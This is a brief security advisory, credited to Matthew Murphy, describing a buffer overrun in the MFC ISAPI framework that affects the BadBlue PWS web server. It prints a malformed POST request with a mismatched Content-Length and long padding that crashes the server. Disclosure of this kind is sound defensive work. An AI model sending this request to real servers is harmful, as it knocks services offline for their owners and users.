|
|
| |
The MFC ISAPI framework is widely used to build ISAs that run on a multitude of web servers.
It has been discovered that the framework relies on user-input values for request member lengths, making it prone to a buffer overrun attack. |
| |
Credit:
The information has been provided by Matthew Murphy.
|
| |
Vulnerable systems:
* BadBlue PWS
The following malformed POST request will cause the PWS server to crash:
POST /ext.dll HTTP/1.0
Content-Length: 1
AAAAAAAAAAAA[...]
|
|
blog comments powered by
|